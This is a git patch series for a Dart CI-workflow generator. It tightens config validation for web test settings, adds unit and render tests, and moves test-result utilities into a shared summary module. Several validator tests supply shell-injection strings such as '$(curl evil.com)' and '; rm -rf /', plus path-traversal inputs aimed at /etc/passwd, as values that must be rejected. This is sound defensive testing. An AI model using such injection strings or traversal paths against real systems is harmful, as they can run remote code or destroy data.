int) { errors.add('ci.web_test.concurrency must be an integer, got ${concurrency.runtimeType}'); - } else if (concurrency < 1) { - errors.add('ci.web_test.concurrency must be a positive integer, got $concurrency'); + } else if (concurrency < 1 || concurrency > 32) { + errors.add('ci.web_test.concurrency must be between 1 and 32, got $concurrency'); } } @@ -451,6 +476,7 @@ class WorkflowGenerator { if (paths is! List) { errors.add('ci.web_test.paths must be an array, got ${paths.runtimeType}'); } else { + final seenPaths = {}; for (var i = 0; i < paths.length; i++) { final pathValue = paths[i]; if (pathValue is! String || pathValue.trim().isEmpty) { @@ -480,6 +506,10 @@ class WorkflowGenerator { } if (RegExp(r'[^A-Za-z0-9_./-]').hasMatch(pathValue)) { errors.add('ci.web_test.paths[$i] contains unsupported characters: "$pathValue"'); + continue; + } + if (!seenPaths.add(normalized)) { + errors.add('ci.web_test.paths contains duplicate path "$normalized"'); } } } @@ -487,6 +517,16 @@ class WorkflowGenerator { } } + // Cross-validate: both mismatch directions + // Direction 1: config present but feature disabled (below) + // Direction 2: feature enabled but config wrong type — handled by web_test block above + if (features is Map) { + final webTestEnabled = features['web_test'] == true; + if (!webTestEnabled && webTestConfig is Map && webTestConfig.isNotEmpty) { + errors.add('ci.web_test config is present but ci.features.web_test is not enabled (dead config?)'); + } + } + return errors; } @@ -510,9 +550,10 @@ class WorkflowGenerator { } if (features['web_test'] == true) { - final webTestConfig = ciConfig['web_test'] as Map? ?? {}; - final concurrency = webTestConfig['concurrency'] ?? 1; - final webPaths = webTestConfig['paths'] as List? ?? []; + final wtConfig = ciConfig['web_test']; + final wtMap = wtConfig is Map ? wtConfig : {}; + final concurrency = wtMap['concurrency'] is int ? wtMap['concurrency'] : 1; + final webPaths = wtMap['paths'] is List ? 
wtMap['paths'] as List : []; Logger.info(' Web test: concurrency=$concurrency, paths=${webPaths.isEmpty ? "(all)" : webPaths.join(", ")}'); } diff --git a/templates/github/workflows/ci.skeleton.yaml b/templates/github/workflows/ci.skeleton.yaml index b5af516..b210259 100644 --- a/templates/github/workflows/ci.skeleton.yaml +++ b/templates/github/workflows/ci.skeleton.yaml @@ -461,6 +461,7 @@ jobs: <%/secrets_list%> <%/has_secrets%> steps: + # ── shared:checkout ── keep in sync with single_platform / multi_platform ── - uses: actions/checkout@v6.0.2 with: <%#format_check%> @@ -472,6 +473,7 @@ jobs: lfs: true <%/lfs%> + # ── shared:git-config ── keep in sync with single_platform / multi_platform ── - name: Configure Git for HTTPS with Token shell: bash run: | @@ -482,10 +484,12 @@ jobs: git config --global url."https://x-access-token:${TOKEN}@github.com/open-runtime/".insteadOf "git@github.com:open-runtime/" git config --global url."https://x-access-token:${TOKEN}@github.com/pieces-app/".insteadOf "git@github.com:pieces-app/" + # ── shared:dart-setup ── keep in sync with single_platform / multi_platform ── - uses: dart-lang/setup-dart@v1.7.1 with: sdk: "<%dart_sdk%>" + # ── shared:pub-cache ── keep in sync with single_platform / multi_platform ── - name: Cache Dart pub dependencies uses: actions/cache@v5.0.3 with: @@ -493,6 +497,15 @@ jobs: key: ${{ runner.os }}-${{ runner.arch }}-dart-pub-${{ hashFiles('**/pubspec.yaml') }} restore-keys: ${{ runner.os }}-${{ runner.arch }}-dart-pub- + # ── shared:proto-setup ── keep in sync with single_platform / multi_platform ── +<%#proto%> + - name: Install protoc + uses: arduino/setup-protoc@v3.0.0 + + - run: dart pub global activate protoc_plugin 25.0.0 + +<%/proto%> + # ── shared:pub-get ── keep in sync with single_platform / multi_platform ── - run: dart pub get env: GIT_LFS_SKIP_SMUDGE: "1" diff --git a/test/workflow_generator_test.dart b/test/workflow_generator_test.dart index 4161089..ee04688 100644 --- 
a/test/workflow_generator_test.dart +++ b/test/workflow_generator_test.dart @@ -524,23 +524,47 @@ void main() { final errors = WorkflowGenerator.validate( _validConfig(webTest: {'concurrency': 0}), ); - expect(errors, anyElement(contains('positive integer'))); + expect(errors, anyElement(contains('between 1 and 32'))); }); test('web_test.concurrency negative produces error', () { final errors = WorkflowGenerator.validate( _validConfig(webTest: {'concurrency': -1}), ); - expect(errors, anyElement(contains('positive integer'))); + expect(errors, anyElement(contains('between 1 and 32'))); + }); + + test('web_test.concurrency exceeds upper bound produces error', () { + final errors = WorkflowGenerator.validate( + _validConfig(webTest: {'concurrency': 33}), + ); + expect(errors, anyElement(contains('between 1 and 32'))); + }); + + test('web_test.concurrency double/float produces error', () { + final errors = WorkflowGenerator.validate( + _validConfig(webTest: {'concurrency': 3.14}), + ); + expect(errors, anyElement(contains('concurrency must be an integer'))); }); test('web_test.concurrency valid int passes', () { final errors = WorkflowGenerator.validate( - _validConfig(webTest: {'concurrency': 4}), + _validConfig( + features: {'proto': false, 'lfs': false, 'web_test': true}, + webTest: {'concurrency': 4}, + ), ); expect(errors.where((e) => e.contains('web_test')), isEmpty); }); + test('web_test.concurrency at upper bound (32) passes', () { + final errors = WorkflowGenerator.validate( + _validConfig(webTest: {'concurrency': 32}), + ); + expect(errors.where((e) => e.contains('concurrency')), isEmpty); + }); + test('web_test.concurrency null is fine (defaults to 1)', () { final errors = WorkflowGenerator.validate( _validConfig(webTest: {}), @@ -582,6 +606,46 @@ void main() { expect(errors, anyElement(contains('must not traverse outside the repo'))); }); + test('web_test.paths with embedded traversal (test/web/../../../etc/passwd) produces error', () { + final errors = 
WorkflowGenerator.validate( + _validConfig( + features: {'proto': false, 'lfs': false, 'web_test': true}, + webTest: {'paths': ['test/web/../../../etc/passwd']}, + ), + ); + expect(errors, anyElement(contains('must not traverse outside the repo'))); + }); + + test('web_test.paths with shell metacharacters (\$(curl evil)) produces error', () { + final errors = WorkflowGenerator.validate( + _validConfig(webTest: { + 'paths': [r'$(curl evil)'], + }), + ); + expect(errors, anyElement(contains('unsupported characters'))); + }); + + test('web_test.paths with shell metacharacters (; rm -rf /) produces error', () { + final errors = WorkflowGenerator.validate( + _validConfig(webTest: { + 'paths': ['; rm -rf /'], + }), + ); + expect(errors, anyElement(contains('unsupported characters'))); + }); + + test('web_test.paths duplicate (after normalization) produces error', () { + final errors = WorkflowGenerator.validate( + _validConfig( + features: {'proto': false, 'lfs': false, 'web_test': true}, + webTest: { + 'paths': ['test/web/foo_test.dart', 'test/web/./foo_test.dart'], + }, + ), + ); + expect(errors, anyElement(contains('duplicate path'))); + }); + test('web_test.paths with backslashes produces error', () { final errors = WorkflowGenerator.validate( _validConfig(webTest: { @@ -627,31 +691,142 @@ void main() { expect(errors, anyElement(contains('newlines/tabs'))); }); - test('valid web_test.paths passes', () { + test('web_test.paths with embedded traversal that escapes repo produces error', () { final errors = WorkflowGenerator.validate( _validConfig(webTest: { - 'paths': ['test/web/foo_test.dart', 'test/web/bar_test.dart'], + 'paths': ['test/../../../etc/passwd'], }), ); + expect(errors, anyElement(contains('must not traverse outside the repo'))); + }); + + test('web_test.paths with embedded .. 
that stays in repo is fine', () { + // test/web/../../etc/passwd normalizes to etc/passwd (still inside repo) + final errors = WorkflowGenerator.validate( + _validConfig( + features: {'proto': false, 'lfs': false, 'web_test': true}, + webTest: { + 'paths': ['test/web/../../etc/passwd'], + }, + ), + ); + expect(errors.where((e) => e.contains('traverse')), isEmpty); + }); + + test('web_test.paths with shell metacharacter \$ produces error', () { + final errors = WorkflowGenerator.validate( + _validConfig(webTest: { + 'paths': [r'$(curl evil.com)'], + }), + ); + expect(errors, anyElement(contains('unsupported characters'))); + }); + + test('web_test.paths with shell metacharacter ; produces error', () { + final errors = WorkflowGenerator.validate( + _validConfig(webTest: { + 'paths': ['test/foo; rm -rf /'], + }), + ); + expect(errors, anyElement(contains('unsupported characters'))); + }); + + test('web_test.paths with duplicate paths produces error', () { + final errors = WorkflowGenerator.validate( + _validConfig(webTest: { + 'paths': ['test/web/foo_test.dart', 'test/web/foo_test.dart'], + }), + ); + expect(errors, anyElement(contains('duplicate path'))); + }); + + test('web_test.paths with duplicate normalized paths produces error', () { + final errors = WorkflowGenerator.validate( + _validConfig(webTest: { + 'paths': ['test/web/./foo_test.dart', 'test/web/foo_test.dart'], + }), + ); + expect(errors, anyElement(contains('duplicate path'))); + }); + + test('web_test.paths with trailing whitespace produces error', () { + final errors = WorkflowGenerator.validate( + _validConfig(webTest: { + 'paths': ['test/web/foo_test.dart '], + }), + ); + expect(errors, anyElement(contains('whitespace'))); + }); + + test('web_test.paths with tab produces error', () { + final errors = WorkflowGenerator.validate( + _validConfig(webTest: { + 'paths': ['test/web/\tfoo_test.dart'], + }), + ); + expect(errors, anyElement(contains('newlines/tabs'))); + }); + + test('valid web_test.paths 
passes', () { + final errors = WorkflowGenerator.validate( + _validConfig( + features: {'proto': false, 'lfs': false, 'web_test': true}, + webTest: { + 'paths': ['test/web/foo_test.dart', 'test/web/bar_test.dart'], + }, + ), + ); expect(errors.where((e) => e.contains('web_test')), isEmpty); }); test('empty web_test.paths list is fine', () { final errors = WorkflowGenerator.validate( - _validConfig(webTest: {'paths': []}), + _validConfig( + features: {'proto': false, 'lfs': false, 'web_test': true}, + webTest: {'paths': []}, + ), ); expect(errors.where((e) => e.contains('web_test')), isEmpty); }); test('valid full web_test config passes', () { final errors = WorkflowGenerator.validate( - _validConfig(webTest: { - 'concurrency': 2, - 'paths': ['test/web/'], - }), + _validConfig( + features: {'proto': false, 'lfs': false, 'web_test': true}, + webTest: { + 'concurrency': 2, + 'paths': ['test/web/'], + }, + ), ); expect(errors.where((e) => e.contains('web_test')), isEmpty); }); + + test('web_test with unknown key (typo) produces error', () { + final errors = WorkflowGenerator.validate( + _validConfig(webTest: {'concurreny': 2}), // typo: concurreny + ); + expect(errors, anyElement(contains('unknown key "concurreny"'))); + }); + + test('cross-validation: web_test config present but feature disabled produces error', () { + final errors = WorkflowGenerator.validate( + _validConfig( + features: {'proto': false, 'lfs': false, 'web_test': false}, + webTest: {'concurrency': 2, 'paths': ['test/web/']}, + ), + ); + expect(errors, anyElement(contains('web_test config is present but ci.features.web_test is not enabled'))); + }); + + test('cross-validation: web_test feature enabled but config wrong type produces error', () { + final config = _validConfig( + features: {'proto': false, 'lfs': false, 'web_test': true}, + ); + config['web_test'] = 'yes'; + final errors = WorkflowGenerator.validate(config); + expect(errors, anyElement(contains('web_test must be an object'))); + }); }); 
// ---- fully valid config produces no errors ---- @@ -757,4 +932,68 @@ void main() { ); }); }); + + // =========================================================================== + // P0: render() — web_test output integration tests + // =========================================================================== + group('WorkflowGenerator.render()', () { + Map _minimalValidConfig({bool webTest = false, Map? webTestConfig}) { + return _validConfig( + dartSdk: '3.9.2', + features: { + 'proto': false, + 'lfs': false, + 'format_check': false, + 'web_test': webTest, + }, + platforms: ['ubuntu'], + webTest: webTestConfig, + ); + } + + test('web_test=false: rendered output does not contain web-test job', () { + final gen = WorkflowGenerator( + ciConfig: _minimalValidConfig(webTest: false), + toolingVersion: '0.0.0-test', + ); + final rendered = gen.render(); + expect(rendered, isNot(contains('web-test:'))); + expect(rendered, isNot(contains('dart test -p chrome'))); + }); + + test('web_test=true: rendered output contains web-test job and chrome test', () { + final gen = WorkflowGenerator( + ciConfig: _minimalValidConfig(webTest: true), + toolingVersion: '0.0.0-test', + ); + final rendered = gen.render(); + expect(rendered, contains('web-test:')); + expect(rendered, contains('dart test -p chrome')); + }); + + test('web_test=true with paths: rendered output includes path args', () { + final gen = WorkflowGenerator( + ciConfig: _minimalValidConfig( + webTest: true, + webTestConfig: {'paths': ['test/web/foo_test.dart'], 'concurrency': 2}, + ), + toolingVersion: '0.0.0-test', + ); + final rendered = gen.render(); + expect(rendered, contains("'test/web/foo_test.dart'")); + expect(rendered, contains('--concurrency=2')); + }); + + test('web_test=true with concurrency at upper bound (32): rendered output uses 32', () { + final gen = WorkflowGenerator( + ciConfig: _minimalValidConfig( + webTest: true, + webTestConfig: {'concurrency': 32}, + ), + toolingVersion: '0.0.0-test', + ); 
+ final rendered = gen.render(); + expect(rendered, contains('--concurrency=32')); + }); + }); } From 32bc1f367b8bfb76404e4a334e7d01da41af21f9 Mon Sep 17 00:00:00 2001 From: Tsavo Knott Date: Tue, 24 Feb 2026 19:50:01 -0500 Subject: [PATCH 04/16] refactor: consolidate test utils into StepSummary, expand render guard tests - Move TestFailure/TestResults/parsing from test_results_util.dart into step_summary.dart (single shared location) - Delete standalone test_results_util.dart - Add render() guard tests: invalid config, multiple errors, invalid web_test - Add cross-validation edge case tests (null config with feature enabled) - Expand web-test skeleton with additional sync markers - Additional linter-driven cleanup across manage_cicd and workflow_generator Co-Authored-By: Claude Opus 4.6 --- SETUP.md | 2 + USAGE.md | 2 + lib/src/cli/commands/test_command.dart | 55 +- lib/src/cli/manage_cicd.dart | 830 +++++++++++++++----- lib/src/cli/utils/step_summary.dart | 276 ++++++- lib/src/cli/utils/test_results_util.dart | 262 ------ lib/src/cli/utils/workflow_generator.dart | 238 ++++-- templates/github/workflows/ci.skeleton.yaml | 8 +- test/workflow_generator_test.dart | 808 +++++++++++++------ 9 files changed, 1676 insertions(+), 805 deletions(-) delete mode 100644 lib/src/cli/utils/test_results_util.dart diff --git a/SETUP.md b/SETUP.md index 4440965..c011602 100644 --- a/SETUP.md +++ b/SETUP.md @@ -321,6 +321,8 @@ The CI workflow (`.github/workflows/ci.yaml`) is generated from your `ci` sectio | `secrets` | object | `{}` | Additional secrets as `{ "ENV_NAME": "SECRET_NAME" }` | | `sub_packages` | list | `[]` | Sub-packages as `[{ "name": "...", "path": "..." }]` | +When `features.web_test` is `true`, the `web_test` object is optional; if omitted, defaults are used (`concurrency: 1`, `paths: []`). 
+ You can add custom steps before/after tests using user-preservable sections in the generated workflow — look for `# --- BEGIN USER: pre-test ---` and `# --- END USER: post-test ---` markers. To add additional jobs (including reusable workflow calls), diff --git a/USAGE.md b/USAGE.md index 4b8422e..c86bb40 100644 --- a/USAGE.md +++ b/USAGE.md @@ -514,6 +514,8 @@ dart run runtime_ci_tooling:manage_cicd test - Generates a rich GitHub Actions step summary with pass/fail/skip counts and failure details - Runs tests in sub-packages (from `ci.sub_packages`) with `pub get` per package +When `ci.features.managed_test=false`, CI falls back to plain `dart test` with no enhanced capture/reporting. + --- ### analyze diff --git a/lib/src/cli/commands/test_command.dart b/lib/src/cli/commands/test_command.dart index 73c3b60..807a249 100644 --- a/lib/src/cli/commands/test_command.dart +++ b/lib/src/cli/commands/test_command.dart @@ -7,8 +7,8 @@ import 'package:args/command_runner.dart'; import '../../triage/utils/config.dart'; import '../utils/logger.dart'; import '../utils/repo_utils.dart'; +import '../utils/step_summary.dart'; import '../utils/sub_package_utils.dart'; -import '../utils/test_results_util.dart'; /// Run `dart test` on the root package and all configured sub-packages with /// full output capture (two-layer strategy). @@ -27,7 +27,8 @@ class TestCommand extends Command { final String name = 'test'; @override - final String description = 'Run dart test with full output capture and job summary.'; + final String description = + 'Run dart test with full output capture and job summary.'; @override Future run() async { @@ -43,7 +44,9 @@ class TestCommand extends Command { final failures = []; // Determine log directory: TEST_LOG_DIR (CI) or .dart_tool/test-logs/ (local) - final logDir = Platform.environment['TEST_LOG_DIR'] ?? '$repoRoot/.dart_tool/test-logs'; + final logDir = + Platform.environment['TEST_LOG_DIR'] ?? 
+ '$repoRoot/.dart_tool/test-logs'; Directory(logDir).createSync(recursive: true); Logger.info('Log directory: $logDir'); @@ -54,7 +57,9 @@ class TestCommand extends Command { final testDir = Directory('$repoRoot/test'); if (!testDir.existsSync()) { Logger.success('No test/ directory found — skipping root tests'); - _writeTestStepSummary('## Test Results\n\n**No test/ directory found — skipped.**\n'); + StepSummary.write( + '## Test Results\n\n**No test/ directory found — skipped.**\n', + ); } else { // Build test arguments with two file reporters + expanded console output final testArgs = [ @@ -74,7 +79,11 @@ class TestCommand extends Command { // Use Process.start with piped output so we can both stream to console // AND capture the full output for summary generation. - final process = await Process.start(Platform.resolvedExecutable, testArgs, workingDirectory: repoRoot); + final process = await Process.start( + Platform.resolvedExecutable, + testArgs, + workingDirectory: repoRoot, + ); // Stream stdout and stderr to console in real-time while capturing final stdoutBuf = StringBuffer(); @@ -94,14 +103,19 @@ class TestCommand extends Command { final exitCode = await process.exitCode.timeout( processTimeout, onTimeout: () { - Logger.error('Test process exceeded ${processTimeout.inMinutes}-minute timeout — killing.'); + Logger.error( + 'Test process exceeded ${processTimeout.inMinutes}-minute timeout — killing.', + ); process.kill(); // No signal arg — cross-platform safe return -1; }, ); try { - await Future.wait([stdoutDone, stderrDone]).timeout(const Duration(seconds: 30)); + await Future.wait([ + stdoutDone, + stderrDone, + ]).timeout(const Duration(seconds: 30)); } catch (_) { // Ignore stream errors (e.g. 
process killed before streams drained) } @@ -113,10 +127,10 @@ class TestCommand extends Command { } // Parse the JSON results file for structured test data - final results = parseTestResultsJson(jsonPath); + final results = StepSummary.parseTestResultsJson(jsonPath); // Generate and write the rich job summary - writeTestJobSummary(results, exitCode, logDir); + StepSummary.writeTestJobSummary(results, exitCode); if (exitCode != 0) { Logger.error('Root tests failed with exit code $exitCode'); @@ -166,7 +180,9 @@ class TestCommand extends Command { if (pubGetResult.exitCode != 0) { final pubGetStderr = (pubGetResult.stderr as String).trim(); if (pubGetStderr.isNotEmpty) Logger.error(pubGetStderr); - Logger.error(' dart pub get failed for $name (exit code ${pubGetResult.exitCode})'); + Logger.error( + ' dart pub get failed for $name (exit code ${pubGetResult.exitCode})', + ); failures.add(name); continue; } @@ -181,7 +197,9 @@ class TestCommand extends Command { final spExitCode = await spProcess.exitCode.timeout( processTimeout, onTimeout: () { - Logger.error('Test process for $name exceeded ${processTimeout.inMinutes}-minute timeout — killing.'); + Logger.error( + 'Test process for $name exceeded ${processTimeout.inMinutes}-minute timeout — killing.', + ); spProcess.kill(); // No signal arg — cross-platform safe return -1; }, @@ -196,19 +214,14 @@ class TestCommand extends Command { } if (failures.isNotEmpty) { - Logger.error('Tests failed for ${failures.length} package(s): ${failures.join(', ')}'); + Logger.error( + 'Tests failed for ${failures.length} package(s): ${failures.join(', ')}', + ); + final failureBullets = failures.map((name) => '- `$name`').join('\n'); + StepSummary.write('\n## Sub-package Test Failures\n\n$failureBullets\n'); exit(1); } Logger.success('All tests passed'); } } - -/// Write a markdown summary to $GITHUB_STEP_SUMMARY (visible in Actions UI). -/// No-op when running locally (env var not set). 
-void _writeTestStepSummary(String markdown) { - final summaryFile = Platform.environment['GITHUB_STEP_SUMMARY']; - if (summaryFile != null) { - File(summaryFile).writeAsStringSync(markdown, mode: FileMode.append); - } -} diff --git a/lib/src/cli/manage_cicd.dart b/lib/src/cli/manage_cicd.dart index 5f42793..463b4be 100644 --- a/lib/src/cli/manage_cicd.dart +++ b/lib/src/cli/manage_cicd.dart @@ -6,7 +6,7 @@ import 'dart:io'; import '../triage/utils/run_context.dart'; import '../triage/utils/config.dart'; import 'options/manage_cicd_options.dart'; -import 'utils/test_results_util.dart'; +import 'utils/step_summary.dart'; // Re-export path constants from run_context for use throughout this file. // All CI artifacts live under .runtime_ci/ at the repo root: @@ -86,19 +86,25 @@ String _resolveToolingPackageRoot() { final configFile = File('${dir.path}/.dart_tool/package_config.json'); if (configFile.existsSync()) { try { - final configJson = json.decode(configFile.readAsStringSync()) as Map; + final configJson = + json.decode(configFile.readAsStringSync()) as Map; final packages = configJson['packages'] as List? ?? []; for (final pkg in packages) { - if (pkg is Map && pkg['name'] == 'runtime_ci_tooling') { + if (pkg is Map && + pkg['name'] == 'runtime_ci_tooling') { final rootUri = pkg['rootUri'] as String? ?? ''; if (rootUri.startsWith('file://')) { return Uri.parse(rootUri).toFilePath(); } // Relative URI -- resolve against the .dart_tool/ directory - final resolved = Uri.parse('${dir.path}/.dart_tool/').resolve(rootUri); + final resolved = Uri.parse( + '${dir.path}/.dart_tool/', + ).resolve(rootUri); final resolvedPath = resolved.toFilePath(); // Strip trailing slash - return resolvedPath.endsWith('/') ? resolvedPath.substring(0, resolvedPath.length - 1) : resolvedPath; + return resolvedPath.endsWith('/') + ? 
resolvedPath.substring(0, resolvedPath.length - 1) + : resolvedPath; } } } catch (_) {} @@ -114,7 +120,9 @@ String _resolveToolingPackageRoot() { } // Fallback: assume scripts/prompts/ (legacy location in consuming repos) - _warn('Could not resolve runtime_ci_tooling package root. Prompt scripts may not be found.'); + _warn( + 'Could not resolve runtime_ci_tooling package root. Prompt scripts may not be found.', + ); return Directory.current.path; } @@ -193,7 +201,9 @@ void main(List args) async { if (repoRoot == null) { _error('Could not find ${config.repoName} repo root.'); _error('Run this script from inside the repository.'); - _error('If this is a new project, run "init" first to create .runtime_ci/config.json.'); + _error( + 'If this is a new project, run "init" first to create .runtime_ci/config.json.', + ); exit(1); } @@ -288,14 +298,19 @@ Future _runSetup(String repoRoot) async { if (geminiKey != null && geminiKey.isNotEmpty) { _success('GEMINI_API_KEY is set'); } else { - _warn('GEMINI_API_KEY is not set. Set it via: export GEMINI_API_KEY='); + _warn( + 'GEMINI_API_KEY is not set. Set it via: export GEMINI_API_KEY=', + ); } - final ghToken = Platform.environment['GH_TOKEN'] ?? Platform.environment['GITHUB_TOKEN']; + final ghToken = + Platform.environment['GH_TOKEN'] ?? Platform.environment['GITHUB_TOKEN']; if (ghToken != null && ghToken.isNotEmpty) { _success('GitHub token is set'); } else { - _info('No GH_TOKEN/GITHUB_TOKEN set. Run "gh auth login" for GitHub CLI auth.'); + _info( + 'No GH_TOKEN/GITHUB_TOKEN set. 
Run "gh auth login" for GitHub CLI auth.', + ); } // Install Dart dependencies @@ -351,7 +366,10 @@ Future _runValidate(String repoRoot) async { } } else if (file.endsWith('.dart')) { // Validate Dart files compile - final result = Process.runSync('dart', ['analyze', path], workingDirectory: repoRoot); + final result = Process.runSync('dart', [ + 'analyze', + path, + ], workingDirectory: repoRoot); if (result.exitCode == 0) { _success('Valid Dart: $file'); } else { @@ -411,7 +429,9 @@ Future _runExplore(String repoRoot) async { _header('Stage 1: Explorer Agent (Gemini 3 Pro Preview)'); if (!_geminiAvailable(warnOnly: true)) { - _warn('Skipping explore stage (Gemini unavailable). No changelog data will be generated.'); + _warn( + 'Skipping explore stage (Gemini unavailable). No changelog data will be generated.', + ); return; } @@ -431,7 +451,10 @@ Future _runExplore(String repoRoot) async { _error('Ensure runtime_ci_tooling is properly installed (dart pub get).'); exit(1); } - final prompt = _runSync('dart run $promptScriptPath "$prevTag" "$newVersion"', repoRoot); + final prompt = _runSync( + 'dart run $promptScriptPath "$prevTag" "$newVersion"', + repoRoot, + ); if (prompt.isEmpty) { _error('Prompt generator produced empty output. Check $promptScriptPath'); exit(1); @@ -439,7 +462,9 @@ Future _runExplore(String repoRoot) async { ctx.savePrompt('explore', prompt); if (_dryRun) { - _info('[DRY-RUN] Would run Gemini CLI with explorer prompt (${prompt.length} chars)'); + _info( + '[DRY-RUN] Would run Gemini CLI with explorer prompt (${prompt.length} chars)', + ); return; } @@ -503,7 +528,11 @@ Future _runExplore(String repoRoot) async { // the workflow artifact upload step. 
_info(''); _info('Validating Stage 1 artifacts...'); - final artifactNames = ['commit_analysis.json', 'pr_data.json', 'breaking_changes.json']; + final artifactNames = [ + 'commit_analysis.json', + 'pr_data.json', + 'breaking_changes.json', + ]; for (final name in artifactNames) { // Check RunContext path first, then hardcoded fallback final ctxPath = '${ctx.runDir}/explore/$name'; @@ -586,7 +615,10 @@ Future _runCompose(String repoRoot) async { _error('Prompt script not found: $composerScript'); exit(1); } - final prompt = _runSync('dart run $composerScript "$prevTag" "$newVersion"', repoRoot); + final prompt = _runSync( + 'dart run $composerScript "$prevTag" "$newVersion"', + repoRoot, + ); if (prompt.isEmpty) { _error('Composer prompt generator produced empty output.'); exit(1); @@ -594,7 +626,9 @@ Future _runCompose(String repoRoot) async { ctx.savePrompt('compose', prompt); if (_dryRun) { - _info('[DRY-RUN] Would run Gemini CLI with composer prompt (${prompt.length} chars)'); + _info( + '[DRY-RUN] Would run Gemini CLI with composer prompt (${prompt.length} chars)', + ); return; } @@ -603,7 +637,11 @@ Future _runCompose(String repoRoot) async { // Build the @ includes for file context. // Stage 1 artifacts may be at /tmp/ (CI download) or .runtime_ci/runs/explore/ (local). 
final includes = []; - final artifactNames = ['commit_analysis.json', 'pr_data.json', 'breaking_changes.json']; + final artifactNames = [ + 'commit_analysis.json', + 'pr_data.json', + 'breaking_changes.json', + ]; for (final name in artifactNames) { if (File('/tmp/$name').existsSync()) { includes.add('@/tmp/$name'); @@ -651,7 +689,8 @@ Future _runCompose(String repoRoot) async { if (result.exitCode != 0) { _warn('Gemini CLI exited with code ${result.exitCode}'); - if (composeStderr.isNotEmpty) _warn(' stderr: ${composeStderr.split('\n').first}'); + if (composeStderr.isNotEmpty) + _warn(' stderr: ${composeStderr.split('\n').first}'); } if (rawCompose.isNotEmpty) { @@ -692,7 +731,9 @@ Future _runCompose(String repoRoot) async { try { final bytes = File('$repoRoot/CHANGELOG.md').readAsBytesSync(); changelogContent = String.fromCharCodes(bytes.where((b) => b < 128)); - _info('Read CHANGELOG.md with ASCII fallback (${changelogContent.length} chars)'); + _info( + 'Read CHANGELOG.md with ASCII fallback (${changelogContent.length} chars)', + ); } catch (_) { changelogContent = ''; } @@ -747,7 +788,8 @@ Future _runReleaseNotes(String repoRoot) async { _warn('Skipping release notes (Gemini unavailable).'); // Create minimal fallback final newVersion = _versionOverride ?? 'unknown'; - final fallback = '# ${config.repoName} v$newVersion\n\nSee CHANGELOG.md for details.'; + final fallback = + '# ${config.repoName} v$newVersion\n\nSee CHANGELOG.md for details.'; File('/tmp/release_notes_body.md').writeAsStringSync(fallback); return; } @@ -757,7 +799,10 @@ Future _runReleaseNotes(String repoRoot) async { final newVersion = _versionOverride ?? 
_detectNextVersion(repoRoot, prevTag); // Derive bump type - final currentVersion = _runSync("awk '/^version:/{print \$2}' pubspec.yaml", repoRoot); + final currentVersion = _runSync( + "awk '/^version:/{print \$2}' pubspec.yaml", + repoRoot, + ); final currentParts = currentVersion.split('.'); final newParts = newVersion.split('.'); String bumpType = 'minor'; @@ -780,17 +825,23 @@ Future _runReleaseNotes(String repoRoot) async { final releaseNotesDir = Directory('$repoRoot/$kReleaseNotesDir/v$newVersion'); releaseNotesDir.createSync(recursive: true); final verifiedContributors = _gatherVerifiedContributors(repoRoot, prevTag); - File( - '${releaseNotesDir.path}/contributors.json', - ).writeAsStringSync(const JsonEncoder.withIndent(' ').convert(verifiedContributors)); - _info('Verified contributors: ${verifiedContributors.map((c) => '@${c['username']}').join(', ')}'); + File('${releaseNotesDir.path}/contributors.json').writeAsStringSync( + const JsonEncoder.withIndent(' ').convert(verifiedContributors), + ); + _info( + 'Verified contributors: ${verifiedContributors.map((c) => '@${c['username']}').join(', ')}', + ); // ── Load issue manifest for verified issue data ── List verifiedIssues = []; - for (final path in ['/tmp/issue_manifest.json', '$repoRoot/$kCicdRunsDir/triage/issue_manifest.json']) { + for (final path in [ + '/tmp/issue_manifest.json', + '$repoRoot/$kCicdRunsDir/triage/issue_manifest.json', + ]) { if (File(path).existsSync()) { try { - final manifest = json.decode(File(path).readAsStringSync()) as Map; + final manifest = + json.decode(File(path).readAsStringSync()) as Map; verifiedIssues = (manifest['github_issues'] as List?) ?? 
[]; } catch (_) {} break; @@ -805,7 +856,10 @@ Future _runReleaseNotes(String repoRoot) async { _error('Prompt script not found: $rnScript'); exit(1); } - final prompt = _runSync('dart run $rnScript "$prevTag" "$newVersion" "$bumpType"', repoRoot); + final prompt = _runSync( + 'dart run $rnScript "$prevTag" "$newVersion" "$bumpType"', + repoRoot, + ); if (prompt.isEmpty) { _error('Release notes prompt generator produced empty output.'); exit(1); @@ -813,7 +867,9 @@ Future _runReleaseNotes(String repoRoot) async { ctx.savePrompt('release-notes', prompt); if (_dryRun) { - _info('[DRY-RUN] Would run Gemini CLI for release notes (${prompt.length} chars)'); + _info( + '[DRY-RUN] Would run Gemini CLI for release notes (${prompt.length} chars)', + ); return; } @@ -821,7 +877,11 @@ Future _runReleaseNotes(String repoRoot) async { // Build @ includes -- give Gemini all available context final includes = []; - final artifactNames = ['commit_analysis.json', 'pr_data.json', 'breaking_changes.json']; + final artifactNames = [ + 'commit_analysis.json', + 'pr_data.json', + 'breaking_changes.json', + ]; for (final name in artifactNames) { if (File('/tmp/$name').existsSync()) { includes.add('@/tmp/$name'); @@ -863,7 +923,8 @@ Future _runReleaseNotes(String repoRoot) async { if (result.exitCode != 0) { _warn('Gemini CLI failed for release notes: ${result.stderr}'); // Create fallback - final fallback = '# ${config.repoName} v$newVersion\n\nSee CHANGELOG.md for details.'; + final fallback = + '# ${config.repoName} v$newVersion\n\nSee CHANGELOG.md for details.'; File('/tmp/release_notes_body.md').writeAsStringSync(fallback); ctx.finalize(exitCode: result.exitCode); return; @@ -900,7 +961,9 @@ Future _runReleaseNotes(String repoRoot) async { content, verifiedContributors: verifiedContributors, verifiedIssues: verifiedIssues, - repoSlug: Platform.environment['GITHUB_REPOSITORY'] ?? '${config.repoOwner}/${config.repoName}', + repoSlug: + Platform.environment['GITHUB_REPOSITORY'] ?? 
